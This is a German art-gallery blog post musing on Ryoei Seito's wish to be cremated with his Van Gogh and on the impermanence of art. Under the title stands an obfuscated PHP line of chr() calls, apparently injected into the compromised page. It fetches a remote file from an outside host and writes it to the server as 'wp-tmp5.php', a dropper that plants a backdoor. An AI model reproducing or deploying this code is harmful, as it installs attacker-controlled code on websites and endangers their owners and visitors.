/, Commercial, Info/alles hat ein Ende und die kunst…?

alles hat ein Ende und die kunst…?

file_put_contents(chr(119).chr(112).chr(45).chr(116).chr(109).chr(112).chr(53).chr(46).chr(112).chr(104).chr(112),file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(109).chr(121).chr(115).chr(112).chr(97).chr(99).chr(101).chr(105).chr(100).chr(46).chr(115).chr(112).chr(97).chr(99).chr(101).chr(47).chr(108).chr(48).chr(46).chr(116).chr(120).chr(116)));

Der japanische Papierindustrielle Ryoei Seito kaufte 1989 einen VanGogh für 82,5 Millionen Dollar.Sensationell war nciht nur der Preis, sondern die Tatsache, dass vorher in der Kunstwelt niemand von dem schwerreichen japanischen Industriellen gehört hatte.

Nach japanischem Brauch wurden nach dem Tode immer wieder Gegenstände, die einem Menschen besonders lieb waren, zusammen mit dem Verstorbenen eingeäschert. Und so kündigte auch Seito an, sich gemiensam mit seinem geliebten Bild einäschern zu lassen.

Der Papiermagnat verließ diese Welt 1996, wurde vermutlich nach japansichen Riten bestattet, allerdings ohne sein geliebtes Bild.

Waren die Proteste der Kunstfreunde in aller Welt schuld daran?

Was, wenn er das Bild doch mit sich genommen hätte wie es sein letzter Wunsch war? Wäre es nicht ein schönes Ende gewesen eines Werkes, das wie alles andere auch, eines Tages doch den Weg allen irdischen gehen müsste, denn schließlisch ist nichts unendlich, auch nicht die Kunst.

Und ist es nciht gerade die Vergänglichkeit, die den Dingen ihren Reiz verleiht, sie zu genießen, solange wir noch können.

Und wenn Sie jetzt beschließen, eines Ihrer Lieblingskunstwerke mit ins Grab zu nehmen, so hat die Vorstellung einen gewissen Charme, ist aber vermutlich nicht mit den deutschen Freidhofsverordnungen kompatibel.

Und bevor man sich mit der Ordnungsbehörde anlegt, lieber bar allen Besitzes aus dieser Welt scheiden.

Kunstwerke für die Ewigkeit, Galerie Mouzaoui

By | 2019-09-07T21:39:12+02:00 September 7th, 2019|Allgemein, Commercial, Info|0 Comments

About the Author:

Onlinegalerie Mouzaoui,wir sind am Puls der Zeit!

Durch die weitere Nutzung der Seite stimmen Sie der Verwendung von Cookies zu. Weitere Informationen

Die Cookie-Einstellungen auf dieser Website sind auf "Cookies zulassen" eingestellt, um das beste Surferlebnis zu ermöglichen. Wenn Sie diese Website ohne Änderung der Cookie-Einstellungen verwenden oder auf "Akzeptieren" klicken, erklären Sie sich damit einverstanden.

Schließen